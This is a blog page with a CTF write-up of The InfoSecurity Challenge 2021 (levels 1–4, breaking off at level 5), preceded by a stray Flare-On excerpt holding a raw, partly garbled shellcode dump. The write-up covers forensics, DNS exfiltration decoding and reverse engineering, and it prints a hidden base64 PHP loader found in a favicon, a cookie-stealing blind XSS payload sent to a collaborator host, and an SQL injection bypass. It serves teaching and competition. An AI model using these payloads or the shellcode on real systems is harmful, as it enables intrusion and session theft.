For me, it was a useful opportunity to take one step beyond foundational memory corruption skills by exploiting a write-what-where gadget to achieve code execution. It also demonstrated the power of black-box coverage-guided fuzzing in a vulnerability research workflow. I hope this write-up proves useful for other beginners.

Imposter Alert: Extracting and Reversing Metasploit Payloads (Flare-On 2020 Challenge 7)

25 October 2021 at 08:03
Rr(J1a|, RWRJLxHQY I:I41 8u};}$uXX$fKXD$$[[aYZQ__Z]h32hws2_ThLw)TPh)kPPPP@P@PhjhDh\jVWhtatNuhVjjVWh_6KXORj@hQjhXSSVPjVSWh_)u[Y]UWkillervulture123^1u1u10UEIu_Q FCE8820000006089E531C0648B50308B520C8B52148B72280FB74A2631FFAC3C617C022C20C1CF0D01C7E2F252578B52108B4A3C8B4C1178E34801D1518B592001D38B4918E33A498B348B01D631FFACC1CF0D01C738E075F6037DF83B7D2475E4588B582401D3668B0C4B8B581C01D38B048B01D0894424245B5B61595A51FFE05F5F5A8B12EB8D5D6833320000687773325F54684C772607FFD5B89001000029C454506829806B00FFD5505050504050405068EA0FDFE0FFD5976A0568C0A84415680200115C89E66A1056576899A57461FFD585C0740CFF4E0875EC68F0B5A256FFD56A006A0456576802D9C85FFFD58B3681F64B584F528D0E6A406800100000516A006858A453E5FFD58D98000100005356506A005653576802D9C85FFFD501C329C675EE5B595D555789DFE8100000006B696C6C657276756C747572653132335E31C0AAFEC075FB81EF0001000031DB021C0789C280E20F021C168A140786141F881407FEC075E831DBFEC0021C078A140786141F88140702141F8A1417305500454975E55FC351

The InfoSecurity Challenge 2021 Full Writeup: Battle Royale for $30k

26 November 2021 at 03:32

Introduction

From 29 October to 14 November 2021, the Centre for Strategic Infocomm Technologies (CSIT) ran The InfoSecurity Challenge (TISC), an individual competition consisting of 10 levels that tested participants' cybersecurity and programming skills. This format was a big departure from last year's iteration (you can read my writeup here), which was a timed 48-hour challenge focused primarily on reverse engineering and binary exploitation.

Now with two weeks and 10 levels, the difficulty and variety of the challenges greatly increased. As you would expect, the prize pool grew accordingly – instead of $3,000 in vouchers in 2020, it was now $30,000 in cold hard cash. Participants unlocked the prize money in increments of $10,000 from level 8 to 10, with successful solvers splitting the pool equally. For example, if there was only one solver for level 10, they would claim the full $10,000 for themselves.

Hmm... why does this sound so familiar?

Squid Game Piggy Bank

However, since I was playing for charity, I was more interested in testing my skills, particularly in the binary exploitation domain. I placed 6th in the previous TISC and wanted to see what difference a year of learning had made.

I spent more than a hundred hours cracking my head against seemingly impossible tasks ranging from web, mobile, steganography, binary exploitation, custom shellcoding, cryptography and more. Levels 8 to 10 combined multiple domains and each one felt like a mini-CTF. While I considered myself reasonably proficient in web, I stepped way out of my comfort zone tackling the broad array of domains, especially as an absolute beginner in pwn, forensics, and steganography. Since I could only unlock each level by completing the previous one, I forced myself to learn new techniques every time.

I took away important lessons for both CTFs and day-to-day red teaming that I hope others will find useful as well. What distinguished TISC from typical CTFs was its dual emphasis on hacking AND programming – rather than exploiting a single vulnerability, I often needed to automate exploits thousands of times. You'll see what I mean soon.

Let's dive into the challenges. You may want to skip the earlier levels as they were fairly basic. You should definitely read levels 8-10, but honestly every challenge from level 3 onwards is interesting.

Level 1: Scratching the Surface

I warmed up on basic forensics and steganography challenges.

Part 1

Domains: Forensics

We've sent the following secret message on a secret channel.

Submit your flag in this format: TISC{decoded message in lower case}

file1.wav

The phrase “secret channel” suggested data smuggling via an audio channel, a common steganography technique. file1.wav played a cheery tune that I could not recognise. I quickly applied common tools and techniques like binwalk as described in this Medium article but found nothing. I even tried XORing both channels:

import wave
import struct

# Read every frame of the stereo file as a flat sequence of 16-bit samples
wav = wave.open("file1.wav", mode='rb')
frame_bytes = wav.readframes(wav.getnframes())
wav.close()
shorts = struct.unpack('<' + 'H' * (len(frame_bytes) // 2), frame_bytes)

# Samples are interleaved: left, right, left, right, ...
extracted_left = shorts[::2]
extracted_right = shorts[1::2]
print(len(extracted_left))
print(len(extracted_right))

# XOR the least significant bit of each left/right sample pair
extractedLSB = ""
for left, right in zip(extracted_left, extracted_right):
    extractedLSB += str((left & 1) ^ (right & 1))

# Regroup the bit string into bytes and print the first 500 characters
string_blocks = (extractedLSB[i:i+8] for i in range(0, len(extractedLSB), 8))
decoded = ''.join(chr(int(char, 2)) for char in string_blocks)
print(decoded[0:500])

Slightly panicking at this simple challenge, I returned to the “secret channel” hint. I separated each audio channel from the file with a command from Stack Overflow: ffmpeg -i file1.wav -map_channel 0.0.0 ch0.wav -map_channel 0.0.1 ch1.wav. I played ch1.wav and instead of funky music, I heard a series of beeps – Morse code! I used an online Morse Code audio decoder and got the flag.

TISC{csitislocatedinsciencepark}
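The same channel split can be sketched in Python with only the standard library. This is a minimal sketch that assumes an uncompressed stereo PCM file; the function name split_stereo and the output paths are hypothetical and not part of the original solution, which used ffmpeg.

```python
import wave


def split_stereo(path, left_path, right_path):
    """Write each channel of a stereo PCM WAV file to its own mono file."""
    with wave.open(path, "rb") as src:
        if src.getnchannels() != 2:
            raise ValueError("expected a stereo file")
        width = src.getsampwidth()      # bytes per sample
        rate = src.getframerate()
        frames = src.readframes(src.getnframes())

    # Each frame holds one left sample followed by one right sample
    frame_size = 2 * width
    left = bytearray()
    right = bytearray()
    for offset in range(0, len(frames), frame_size):
        left += frames[offset:offset + width]
        right += frames[offset + width:offset + frame_size]

    for out_path, data in ((left_path, left), (right_path, right)):
        with wave.open(out_path, "wb") as dst:
            dst.setnchannels(1)
            dst.setsampwidth(width)
            dst.setframerate(rate)
            dst.writeframes(bytes(data))
```

Calling split_stereo("file1.wav", "ch0.wav", "ch1.wav") would be the rough equivalent of the ffmpeg command, leaving the second channel in ch1.wav.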

Part 2

Domains: Forensics

This is a generic picture. What is the modify time of this photograph?

Submit your flag in the following format: TISC{YYYY:MM:DD HH:MM:SS}

file2.jpg

exiftool solved this in no time.

TISC{2021:10:30 03:40:49}

Part 3

Domains: Forensics, Cryptography

Nothing unusual about the Singapore logo right?

Submit your flag in the following format: TISC{ANSWER}

file3.jpg

The first appearance of the cryptography domain! I opened the file in the 010 Editor hex editor which highlighted an anomalous data blob at the end of the file.

file3.jpg Hex Bytes

The PK magic bytes identified this blob as a zip file. I extracted it with binwalk -e file3.jpg which revealed another image file picture_with_text.jpg. I opened it in 010 Editor and spotted some garbage bytes at the start of the file.
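For readers without binwalk, the carving step can be approximated in Python. This is a rough sketch, assuming the archive starts at the first PK\x03\x04 signature in the file; the helper names are hypothetical, and a real carver would need to handle a signature that appears by chance inside the image data.

```python
import io
import zipfile

ZIP_LOCAL_HEADER = b"PK\x03\x04"  # signature of a ZIP local file header


def carve_appended_zip(blob):
    """Return the bytes from the first ZIP local-file header onwards, or None."""
    start = blob.find(ZIP_LOCAL_HEADER)
    return blob[start:] if start != -1 else None


def list_carved_names(blob):
    """List the member names of the ZIP archive appended to blob, if any."""
    carved = carve_appended_zip(blob)
    if carved is None:
        return []
    with zipfile.ZipFile(io.BytesIO(carved)) as archive:
        return archive.namelist()
```

Passing the raw bytes of file3.jpg to list_carved_names should then list the embedded image.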

picture_with_text.jpg Hex Bytes

NAFJRE GB GUVF PUNYYRATR VF URER NCCYRPNEEBGCRNE looked like a simple text cipher. I popped into CyberChef and quickly discovered that it was ROT13 “encryption”.

TISC{APPLECARROTPEAR}
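The ROT13 step is easy to reproduce outside CyberChef. A minimal sketch using the rot_13 codec from Python's standard library:

```python
import codecs

# Text recovered from the start of picture_with_text.jpg
ciphertext = "NAFJRE GB GUVF PUNYYRATR VF URER NCCYRPNEEBGCRNE"

# ROT13 shifts each letter by 13 places, so decoding and encoding are the same operation
plaintext = codecs.decode(ciphertext, "rot_13")
print(plaintext)
```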

Part 4

Domains: Forensics

Excellent! Now that you have show your capabilities, CSIT SOC team have given you an .OVA virtual image in investigating a snapshot of a machine that has been compromised by PALINDROME. What can you uncover from the image?

Once you download the VM, use this free flag TISC{Yes, I've got this.} to unlock challenge 4 – 10.

https://transfer.ttyusb.dev/I6aQoOSuUuAoIIaqMWWkCcKyOk/windows10.ova

Check MD5 hash: c5b401cce9a07a37a6571ebe5d4c0a48

For guide on how to import the ova file into VirtualBox, please follow the VM importing guide attached.

Please download and install Virtualbox ver 6.1.26 instead of ver 6.1.28, as there has been reports of errors when trying to install the Win 10 VM image.

This challenge contained six flags but no rollercoasters. I naively imported the VM into Virtualbox and got to work.

What is the name of the user?

Submit your flag in the format: TISC{name}.

What is whoami?

TISC{adam}

Which time was the user's most recent logon? Convert it UTC before submitting.

Submit your flag in the UTC format: TISC{DD/MM/YYYY HH:MM:SS}.

I experienced my first facepalm moment of the competition (there would be many more to come). The most recent logon time got reset after I logged into the VM, so it was time to download Autopsy.

After Autopsy imported and processed the OVA file, I found the most recent logon time under OS Accounts > adam > Last Login and converted the timezone to UTC.

TISC{17/06/2021 02:41:37}

A 7z archive was deleted, what is the value of the file CRC32 hash that is inside the 7z archive?

Submit your flag in this format: TISC{CRC32 hash in upper case}.

I found the deleted archive at Data Artifacts > Recycle Bin and generated the CRC32 hash with 7-Zip.

TISC{040E23DA}
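7-Zip reports the CRC32 directly, but the value can be cross-checked in Python once the file has been extracted from the archive. This is a sketch under that assumption; crc32_of_file is a hypothetical helper name, and the standard library cannot read 7z archives itself.

```python
import zlib


def crc32_of_file(path, chunk_size=65536):
    """Return the CRC32 of a file as an 8-digit upper-case hex string."""
    checksum = 0
    with open(path, "rb") as handle:
        # Feed the file through zlib.crc32 in chunks to keep memory use flat
        while chunk := handle.read(chunk_size):
            checksum = zlib.crc32(chunk, checksum)
    return format(checksum & 0xFFFFFFFF, "08X")
```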

Question1: How many users have an RID of 1000 or above on the machine?

Question2: What is the account name for RID of 501?

Question3: What is the account name for RID of 503?

Submit your flag in this format: TISC{Answer1-Answer2-Answer3}. Use the same case for the Answers as you found them.

I got all of the answers under OS Accounts although I was briefly confused by the system users.

TISC{1-Guest-DefaultAccount}

Question1: How many times did the user visit https://www.csit.gov.sg/about-csit/who-we-are ?

Question2: How many times did the user visit https://www.facebook.com ?

Question3: How many times did the user visit https://www.live.com ?

Submit your flag in this format: TISC{ANSWER1-ANSWER2-ANSWER3}.

I found the visit counts under Data Artifacts > Web History.

TISC{2-0-0}

A device with the drive letter “Z” was connected as a shared folder in VirtualBox. What was the label of the volume? Perhaps the registry can tell us the “connected” drive?

Submit your flag in this format: TISC{label of volume}.

I found this a little difficult. I resorted to adding another shared folder to the VM then searching for the label name in Registry Editor to figure out which registry key controlled the volume labels. This led me to the registry path Computer\HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2 which contained all the volume labels.

TISC{vm-shared}

A file with SHA1 0D97DBDBA2D35C37F434538E4DFAA06FCCC18A13 is in the VM… somewhere. What is the original name of the file that is of interest?

Submit your flag in this format: TISC{original name of file with correct file extension}.

Since Autopsy only supported SHA256 and MD5 hashes, I resorted to guessing that it was one of the files under Data Artifacts > Recent Documents. I extracted all of them and ran Get-FileHash -Algorithm SHA1 * against them. The shortcut otter-singapore.lnk, which used to point to otter-singapore.jpg, matched the SHA1 hash.

TISC{otter-singapore.jpg}
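The same hash sweep can be done without PowerShell. A minimal sketch, assuming the extracted files sit in a single directory; find_by_sha1 is a hypothetical helper name.

```python
import hashlib
from pathlib import Path


def find_by_sha1(directory, wanted_hex):
    """Return the names of files in directory whose SHA1 digest equals wanted_hex."""
    wanted = wanted_hex.lower()
    matches = []
    for path in sorted(Path(directory).iterdir()):
        if path.is_file():
            digest = hashlib.sha1(path.read_bytes()).hexdigest()
            if digest == wanted:
                matches.append(path.name)
    return matches
```

The upper-case hash from the challenge text can be passed in as-is because the comparison is case-insensitive.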

Level 2: Dee Na Saw as a need

Domain: Network Forensics

We have detected and captured a stream of anomalous DNS network traffic sent out from one of the PALINDROME compromised servers. None of the domain names found are active. Either PALINDROME had shut them down or there's more to it than it seems.

This level contains 2 flags and both flags can be found independently from the same pcap file as attached here.

Flag 1 will be in this format, TISC{16 characters}.

Flag 2 will be in this format, TISC{17 characters}.

traffic.pcap

As a newbie to steganography, I felt that this level was the most “CTF-y” and actually got stuck for two days hunting flag 1 and ragequit for a while. Fortunately, I managed to get it after cooling off.

Flag 2

traffic.pcap consisted of a short series of DNS query responses.

file3.jpg Hex Bytes

A few anomalies stood out to me:

  1. The domain names clearly contained some kind of exfiltration data and matched the format d33d<9 hex chars>.toptenspot.net.
  2. The Time to Live (TTL) values constantly changed, which should not be the case with a typical DNS server.
  3. The serial numbers also kept changing.

For the domain names, I noticed that the first two hex chars were always numeric e.g. 10, 11, 12. I extracted the hex chars with scapy and tried hex-decoding them but it only produced gibberish. After fiddling around with a few variations such as XORing consecutive bytes, I came across this CTF writeup that described Base32 encoding of data in DNS query names. Base32 encoding uses a charset similar to that of hex numbers. I tried Base32 decoding the “hex chars” with CyberChef and immediately spotted a few interesting outputs such as <NON-ASCII CHARS>ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghij. After playing around with the offsets, I realised that the first two (numeric) characters were bad bytes, while the rest of the characters made up a valid base32 string.

I automated the decoding routine with a quick script.

from scapy.all import *
from scapy.layers.dns import DNS
import base64

dns_packets = rdpcap('traffic.pcap')
encoded = ''

for packet in dns_packets:
    if packet.haslayer(DNS):
        encoded += packet[DNS].qd.qname[6:13].decode('utf-8')

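# Base32 input must be a multiple of 8 characters, so drop any trailing partial block
usable_length = len(encoded) - (len(encoded) % 8)
decoded = base64.b32decode(encoded[:usable_length]).decode('utf-8')
print(decoded)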

This produced a bunch of lorem ipsum text along with the second flag.

TISC{n3vEr_0dd_0r_Ev3n}

Flag 1

With the first anomalous property solved, I focused on the TTLs and serial numbers, wasting many hours chasing what eventually turned out to be a red herring. The TTLs and serial numbers generally matched a pattern – Serial number + TTL = unix timestamp – that made it seem like I was on the right path. After many fruitless hours spent mutating these values in increasingly insane permutations, I gave up and took a break.

When I returned, I went back to basics and considered the numeric “bad bytes” from the DNS domain names. I decided to check the range of these values. They went from 01 to 64... could it be? I transposed the numbers to the base64 alphabet, then base64-decoded them... yep, it was a DOCX file.

Pictured below is the moment the challenge creator thought of the TTL red herring.

file3.jpg Hex Bytes

Moving on, I extracted the DOCX file with scapy.

from scapy.all import *
from scapy.layers.dns import DNS
import base64

dns_packets = rdpcap('traffic.pcap')

alphabet = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'
encoded = ''

for packet in dns_packets:
    if packet.haslayer(DNS):
        encoded += alphabet[int(packet[DNS].qd.qname[4:6].decode('utf-8'))-1]

decoded = base64.b64decode(encoded + '==')
with open('output.docx', 'wb') as file:
    file.write(decoded)

The word document contained the pretty obvious clue now you see me, what you seek is within. Since DOCX files are actually ZIP files in disguise, I unzipped the DOCX and grepped the files for the flag format TISC{. I found what I was looking for in word/theme/theme1.xml.

TISC{1iv3_n0t_0n_3vi1}
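The unzip-and-grep step can also be scripted. A minimal sketch, assuming the flag is stored as plain text inside one of the archive members; find_flags_in_zip is a hypothetical helper name.

```python
import re
import zipfile

FLAG_PATTERN = re.compile(rb"TISC\{[^}]*\}")


def find_flags_in_zip(source):
    """Return (member name, flag) pairs for every flag-shaped string in a ZIP or DOCX."""
    hits = []
    with zipfile.ZipFile(source) as archive:
        for name in archive.namelist():
            for match in FLAG_PATTERN.findall(archive.read(name)):
                hits.append((name, match.decode("utf-8", errors="replace")))
    return hits
```

Running find_flags_in_zip("output.docx") would report which member holds the match, which is how a hit in a theme file would surface.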

Level 3: Needle in a Greystack

Domains: Reverse Engineering

An attack was detected on an internal network that blocked off all types of executable files. How did this happen?

Upon further investigations, we recovered these 2 grey-scale images. What could they be?

1.bmp

2.bmp

I opened both files in 010 Editor and noticed that both 1.bmp and 2.bmp embedded data in the BMP pixel colour bytes in reverse order. 1.bmp contained a Windows executable while 2.bmp contained simple ASCII text.

1.bmp Hex Bytes

2.bmp Hex Bytes

I extracted them with a simple Python script.

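# BMP stores pixel rows bottom-up, so walk the rows from the end of the file.
# Each row of 1.bmp is 148 bytes long; the last 3 bytes of every row are dropped.
with open("1.bmp", "rb") as bmp_1, open("1.exe", "wb") as out_file:
    data = bmp_1.read()

    output = data[-148:][:-3]
    for i in range(1, 145):
        output += data[-((i + 1) * 148):-(i * 148)][:-3]

    out_file.write(output)

# Each row of 2.bmp is 100 bytes long; the last byte of every row is dropped.
with open("2.bmp", "rb") as bmp_2, open("2.txt", "wb") as out_file:
    data = bmp_2.read()

    output = data[-100:][:-1]
    for i in range(1, 99):
        output += data[-((i + 1) * 100):-(i * 100)][:-1]

    out_file.write(output)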

Running 1.exe, I received the following output:

> .\1.exe
HELLO WORLD
flag{THIS_IS_NOT_A_FLAG}

Digging deeper, I decompiled the executable with IDA and noticed that the main function checked for a .txt file in the first argument.

  puts("HELLO WORLD");
  if ( argc < 2 )
    goto LABEL_34;
  v3 = argv[1];
  v4 = strrchr(v3, 46);
  if ( !v4 || v4 == v3 )
    v5 = (const char *)&unk_40575A;
  else
    v5 = v4 + 1;
  v6 = strcmp("txt", v5);
  if ( v6 )
    v6 = v6 < 0 ? -1 : 1;
  if ( v6 )
  {
LABEL_34:
    puts("flag{THIS_IS_NOT_A_FLAG}");
    return 1;
  }
  fopen_s(&Stream, argv[1], "rb");
  v7 = (void (__cdecl *)(FILE *, int, int))fseek;
  if ( Stream )
  {
    fseek(Stream, 0, 2);
    v8 = ftell(Stream);
    v23 = v8 >> 31;
    v24 = v8;
    fclose(Stream);
  }

I tested this with a random text file, which yielded the following output.

> .\1.exe .\2.txt
HELLO WORLD
Almost There!!

Looking further down the pseudocode for main, I noticed that it called a function that VirtualAlloced some memory, copied data into it, then ran LoadLibraryA. Since Almost There!! did not appear as a string in 1.exe, I suspected that it came from the dynamically loaded library.

I set a breakpoint at the memcpy and ran the IDA debugger. Checking the arguments to memcpy at the breakpoint, I confirmed that it copied an executable file that included the magic bytes MZ followed by This program cannot be run in DOS mode.

IDA Debugger 1.exe

Now I needed to dump this data. I manually figured out the size of the file by checking for the Application Manifest XML text that appeared at the end of the source buffer. Next, I dumped it in WinDBG with .writemem b.exe ebx L2600.

The executable turned out to be a DLL that contained the decoding routine in the dllmain_dispatch function, which was executed every time 1.exe loaded it with LoadLibraryA.

The DLL decompiled to pseudocode which I identified as the RC4 key-scheduling algorithm (KSA) due to the 256-iteration loop.

if ( Block )
    {
    v4 = strcmp(Block, "Words of the wise may open many locks in life.");
    if ( v4 )
        v4 = v4 < 0 ? -1 : 1;
    if ( !v4 )
        puts("*Wink wink*");
    }
    memset(v18, 0, 0xFFu);
    for ( i = 0; i < 256; ++i )           // RC4 Key Scheduling Algorithm
    *((_BYTE *)&Stream[1] + i) = i;
    v6 = 0;
    Stream[0] = 0;
    do
    {
    v7 = *((_BYTE *)&Stream[1] + v6);
    v8 = (FILE *)(unsigned __int8)(LOBYTE(Stream[0]) + Block[v6 % 0xEu] + v7);
    Stream[0] = v8;
    *((_BYTE *)&Stream[1] + v6++) = *((_BYTE *)&Stream[1] + (_DWORD)v8);
    *((_BYTE *)&Stream[1] + (_DWORD)v8) = v7;
    }

The pseudocode contained two more important tidbits of information. Firstly, “Words of the wise may open many locks in life” looked like a hint. Secondly, the KSA loop used 0xE as the modulus, telling me that the RC4 key was 14 bytes long.
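For reference, here is how the textbook RC4 key schedule looks in Python, which makes the role of the key-length modulus easier to see. This is a sketch of standard RC4 only: the decompiled code above shows just the KSA, so the keystream loop in rc4_crypt is an assumption that the DLL follows the unmodified algorithm.

```python
def rc4_ksa(key):
    """Standard RC4 key-scheduling algorithm: returns the permuted 256-byte state."""
    state = list(range(256))
    j = 0
    for i in range(256):
        # key[i % len(key)] corresponds to Block[v6 % 0xE] for a 14-byte key
        j = (j + state[i] + key[i % len(key)]) & 0xFF
        state[i], state[j] = state[j], state[i]
    return state


def rc4_crypt(key, data):
    """Encrypt or decrypt data with standard RC4 (the operation is symmetric)."""
    state = rc4_ksa(key)
    i = j = 0
    out = bytearray()
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + state[i]) & 0xFF
        state[i], state[j] = state[j], state[i]
        out.append(byte ^ state[(state[i] + state[j]) & 0xFF])
    return bytes(out)
```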

At first, I fell down a rabbit hole trying to guess the key. Given the name of the challenge and Words of the wise, I thought it had something to do with Gandalf from Lord of the Rings and tried all kinds of phrases associated with him, including youwillnotpass. After a long time, I returned to my senses and realised that the key probably existed in the second file I had extracted earlier. It contained a huge list of words, including rubywise – this was probably what the “Words of the wise” hint was referring to.

I brute forced the keys with a quick Python script.

import subprocess

# keys.txt holds the candidate words, one per line
with open('keys.txt') as file:
    lines = [line.rstrip() for line in file]

for line in lines:
    # Write the candidate key to key.txt, then rerun the executable
    with open('key.txt', 'w') as key:
        key.write(line)
    result = subprocess.run([".\\1.exe", ".\\2.txt"], capture_output=True).stdout
    if b'TISC' in result:
        print(line)
        print(result)

TISC{21232f297a57a5a743894a0e4a801fc3}

Level 4: The Magician's Den

Domains: Web Pentesting

One day, the admin of Apple Story Pte Ltd received an anonymous email.

===

Dear admins of Apple Story,

We are PALINDROME.

We have took control over your system and stolen your secret formula!

Do not fear for we are only after the money.

Pay us our demand and we will be gone.

For starters, we have denied all controls from you.

We demand a ransom of 1 BTC to be sent to 1BvBMSEYstWetqTFn5Au4m4GFg7xJaNVN2 by 31 dec 2021.

Do not contact the police or seek for help.

Failure to do so and the plant is gone.

We planted a monitoring kit so do not test us.

Remember 1 BTC by 31 dec 2021 and we will be gone.

Muahahahaha.

Regards,

PALINDROME

===

Management have just one instruction. Retrieve the encryption key before the deadline and solve this.

http://wp6p6avs8yncf6wuvdwnpq8lfdhyjjds.ctf.sg:14719

Note: Payloads uploaded will be deleted every 30 minutes.

Finally, a web challenge! The website featured a ransom note and a link to a payment page.

Hacked Page

The challenge came with a free hint: “What are some iconic techniques that the actor PALINDROME mimicked Magecart to evade detection?” Based on this, I researched Magecart's tactics, techniques, and procedures (TTPs) and found out that the threat actor hid malicious payloads in image files. I checked each of the loaded images and noticed that favicon.ico contained the following PHP code: eval(base64_decode('JGNoPWN1cmxfaW5pdCgpO2N1cmxfc2V0b3B0KCRjaCxDVVJMT1BUX1VSTCwiaHR0cDovL3MwcHE2c2xmYXVud2J0bXlzZzYyeXptb2RkYXc3cHBqLmN0Zi5zZzoxODkyNi94Y3Zsb3N4Z2J0ZmNvZm92eXdieGRhd3JlZ2pienF0YS5waHAiKTtjdXJsX3NldG9wdCgkY2gsQ1VSTE9QVF9QT1NULDEpO2N1cmxfc2V0b3B0KCRjaCxDVVJMT1BUX1BPU1RGSUVMRFMsIjE0YzRiMDZiODI0ZWM1OTMyMzkzNjI1MTdmNTM4YjI5PUhpJTIwZnJvbSUyMHNjYWRhIik7JHNlcnZlcl9vdXRwdXQ9Y3VybF9leGVjKCRjaCk7'));. The base64 string decoded to:

$ch=curl_init();
curl_setopt($ch,CURLOPT_URL,"http://<DOMAIN>:18926/xcvlosxgbtfcofovywbxdawregjbzqta.php");
curl_setopt($ch,CURLOPT_POST,1);
curl_setopt($ch,CURLOPT_POSTFIELDS,"14c4b06b824ec593239362517f538b29=Hi%20from%20scada");
$server_output=curl_exec($ch);

This PHP code sent the following HTTP request:

POST /xcvlosxgbtfcofovywbxdawregjbzqta.php HTTP/1.1
Host: <DOMAIN>:18926
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36 Edg/95.0.1020.40
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 190

14c4b06b824ec593239362517f538b29=Hi%20from%20scada

Which returned the following response:

HTTP/1.1 200 OK
Date: Sun, 14 Nov 2021 05:50:11 GMT
Server: Apache/2.4.25 (Debian)
X-Powered-By: PHP/7.2.2
Vary: Accept-Encoding
Content-Length: 77
Connection: close
Content-Type: text/html; charset=UTF-8

New record created successfully in data/9bcd278b611772b366155e078d529145.html

The server created an HTML file from my input. I did a quick check for SQL injection (nothing), then moved on to the next most likely vulnerability – a blind cross-site scripting (XSS) attack. Instead of Hi%20from%20scada, I entered <img src="http://zdgrxeldiyxju6mmytt0cdx3muskg9.burpcollaborator.net" />. After a few minutes, I got a pingback!

GET / HTTP/1.1
Referer: http://magicians-den-web/data/9bcd278b611772b366155e078d529145.html
User-Agent: Mozilla/5.0 (Unknown; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) PhantomJS/2.1.1 Safari/538.1
Accept: */*
Connection: Keep-Alive
Accept-Encoding: gzip, deflate
Accept-Language: en,*
Host: zdgrxeldiyxju6mmytt0cdx3muskg9.burpcollaborator.net

I also realised that the PHP code sent the POST request to a different website at http://<DOMAIN>:18926/. The website included a “Latest sample data” page containing the HTML files created by the POST request, which helped me debug my payloads.

Sample Data Page

Usually, XSS CTF challenges featured data exfiltration via the victim's browser. At first, I suspected that because the victim's User Agent PhantomJS/2.1.1 suffered from a known local file disclosure vulnerability, I was meant to leak /etc/passwd. However, after multiple attempts, I got nowhere, probably because the victim accessed the XSS payload from an http:// URL rather than a file:// URI that could bypass Cross-Origin Resource Sharing (CORS) protections.

Going back to the drawing board, I decided to perform some directory busting with ffuf and discovered that a login page existed at http://<DOMAIN>:18926/login.php.

Login Page

Unfortunately, the signup was disabled, but since the PHPSESSID cookie controlled the user's session, I found the way forward: I needed to leak the admin's session cookie using the blind XSS. I modified my payload to <script>document.body.appendChild(document.createElement("img")).src='http://zdgrxeldiyxju6mmytt0cdx3muskg9.burpcollaborator.net?'%2bdocument.cookie</script> and received a pingback at /?PHPSESSID=64f15ffeb7a191812bddfb9a855e0ffb.
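The %2b in the payload matters because a raw + in a form-encoded body is decoded as a space on the server. A small sketch of building the request body with the standard library, which takes care of that encoding; the collector URL is a placeholder and build_body is a hypothetical helper name, while the field name comes from the decoded PHP code.

```python
from urllib.parse import urlencode

# Parameter name taken from the PHP code hidden in favicon.ico
FIELD = "14c4b06b824ec593239362517f538b29"


def build_body(collector_url):
    """Return a form-encoded body carrying a cookie-exfiltration payload."""
    payload = (
        '<script>document.body.appendChild(document.createElement("img"))'
        ".src='" + collector_url + "?'+document.cookie</script>"
    )
    # urlencode percent-encodes '+' as %2B so it survives form decoding
    return urlencode({FIELD: payload})
```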

After adding the session cookie, I browsed to the login page and got redirected to http://<DOMAIN>:18926/landing_admin.php.

Landing Admin Page

The page listed actions taken by targets and allowed me to filter the results by isALIVE or isDEAD. When I changed the filter, the page sent the following HTTP request:

POST /landing_admin.php HTTP/1.1
Host: <DOMAIN>:18926
Content-Length: 14
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://<DOMAIN>:18926
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36 Edg/95.0.1020.40
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://<DOMAIN>:18926/landing_admin.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=e9b94a5a71d62d9171130ad5890f38ef
Connection: close

filter=isALIVE

Other than the filtered actions, the response included the text Filter applied: <VALUE OF FILTER PARAM>. Switching to the isDEAD filter returned the actions MaybeMessingAroundTheFilterWillHelp? and ButDoYouKnowHow?, hinting at an SQL injection.

I confirmed that the POST /landing_admin.php request was vulnerable to SQL injection using isomorphic SQL statements; adding a simple ' to filter=isALIVE caused the server to omit the Filter applied message and adding '' restored it. However, jumping straight to ' OR '1'='1 failed. Puzzled, I continued testing several payloads and eventually noticed that certain characters were sanitized because they never appeared in the Filter applied message. By fuzzing all possible URL-encoded ASCII characters, I reconstructed the blacklist !"$%&*+,-./:;<=>?@[]^_`{|}~, which only left the special characters #'(). Additionally, I found out that any filter parameter longer than 7 characters always failed.
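The character fuzzing can be sketched as a small loop. This is an illustration only: reflect is a hypothetical callable that would submit a filter value and return the text echoed after Filter applied, and the probes are kept to three characters to stay under the length limit.

```python
import string


def find_stripped_characters(reflect, candidates=string.punctuation):
    """Return the set of candidate characters that never come back in the reflection."""
    stripped = set()
    for char in candidates:
        # Surround the character with letters so its absence is unambiguous
        probe = "a" + char + "b"
        if char not in reflect(probe):
            stripped.add(char)
    return stripped
```

A character that breaks the query outright, such as a lone single quote, would also show up as missing here, so anything flagged this way still needs a manual check.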

Since the injected SQL statement probably looked something like SELECT * from actions WHERE status='<PAYLOAD>', I reasoned that one possible valid payload was 'OR(1)#, creating the final statement SELECT * from actions WHERE status=''OR(1)#'. This neatly dumped all possible actions while commenting out the extra '. Thankfully, the payload worked and the response included the flag as one of the actions.
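The two constraints, the character blacklist and the 7-character limit, are simple to encode as a check for candidate payloads. A minimal sketch, assuming the query shape guessed above; is_viable and build_query are hypothetical helper names.

```python
# Blacklist and length limit as reconstructed from fuzzing the filter parameter
BLACKLIST = set('!"$%&*+,-./:;<=>?@[]^_`{|}~')
MAX_LENGTH = 7


def is_viable(payload):
    """True if the payload fits the length limit and avoids every blacklisted character."""
    return len(payload) <= MAX_LENGTH and not (set(payload) & BLACKLIST)


def build_query(payload):
    """Show the statement the server would run, assuming the guessed query shape."""
    return "SELECT * from actions WHERE status='" + payload + "'"
```

For example, is_viable("' OR '1'='1") is false on both counts, while 'OR(1)# passes at exactly seven characters.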

TISC{H0P3_YOu_eNJ0Y-1t}

Level 5: Need for Speed

Domains: Binary Manipulation, IoT Analytics

